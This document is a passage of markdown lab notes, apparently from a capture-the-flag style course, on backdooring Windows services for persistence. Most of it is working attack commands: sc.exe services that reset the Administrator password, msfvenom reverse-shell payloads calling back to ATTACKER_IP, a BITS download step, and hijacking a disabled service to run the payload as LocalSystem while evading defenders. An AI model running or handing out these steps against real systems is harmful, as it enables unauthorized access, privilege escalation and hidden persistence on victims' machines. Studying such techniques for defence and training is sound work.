# Abusing Services ## Abusing Services ### Creating backdoor services **create and start a service named "THMservice" :** ```cmd sc.exe create THMservice binPath= "net user Administrator Passwd123" start= auto sc.exe start THMservice ``` > **Note:** There must be a space after each equal sign for the command to work. The "net user" command will be executed when the service is started, resetting the Administrator's password to `Passwd123`. Notice how the service has been set to start automatically (start= auto), so that it runs without requiring user interaction. Resetting a user's password works well enough, but we can also create a reverse shell with **msfvenom** and associate it with the created service. Notice, however, that service executables are unique since they need to implement a particular protocol to be handled by the system. If you want to create an executable that is compatible with Windows services, you can use the `exe-service` format in **msfvenom**: ```bash msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4448 -f exe-service -o rev-svc.exe ``` You can then copy the executable to your target system, say in `C:\Windows` ```bash python3 -m http.server 80 ``` ```powershell $URL="http:///" $PATH="C:\Windows" Start-BitsTransfer -Source $URL -Destination $Path ``` point the service's *binPath* to the backdoored service we have created using **msvenom**: ```cmd sc.exe create THMservice2 binPath= "C:\windows\rev-svc.exe" start= auto sc.exe start THMservice2 ``` This should create a connection back to your attacker's machine. ### Modifying existing services While creating new services for persistence works quite well, the blue team may monitor new service creation across the network. We may want to reuse an existing service instead of creating one to avoid detection. Usually, any disabled service will be a good candidate, as it could be altered without the user noticing it. **get a list of available services :** ```cmd sc.exe query state=all ``` You should be able to find a `stopped service` called **THMService3**. **query the service's configuration :** ```cmd C:\> sc.exe qc THMService3 [SC] QueryServiceConfig SUCCESS SERVICE_NAME: THMService3 TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\MyService\THMService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : THMService3 DEPENDENCIES : SERVICE_START_NAME : NT AUTHORITY\Local Service ``` **There are three things we care about when using a service for persistence:** * The executable (**BINARY\_PATH\_NAME**) should point to our payload. * The service **START\_TYPE** should be `automatic` so that the payload runs without user interaction. * The **SERVICE\_START\_NAME**, which is the account under which the service will run, should preferably be set to `LocalSystem` to gain SYSTEM privileges. **creating a new reverse shell with msfvenom :** ```bash msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=5558 -f exe-service -o rev-svc2.exe ``` **To reconfigure "THMservice3" parameters, we can use the following command:** ```cmd sc.exe config THMservice3 binPath= "C:\Windows\rev-svc2.exe" start= auto obj= "LocalSystem" ``` * `binPath= "C:\Windows\rev-svc2.exe"`: This sets the binary path for the service to the location "C:\Windows\rev-svc2.exe." This means the service will execute the specified executable when it's started. * `start= auto`: This sets the startup type of the service to automatic, which means the service will start automatically when the system boots up. * `obj= "LocalSystem"`: This sets the account under which the service will run to the "LocalSystem" account. The "LocalSystem" account has high privileges on the system. You can then query the service's configuration again to check if all went as expected

Start a listener on your attacker's machine and manually start the service to receive a reverse shell.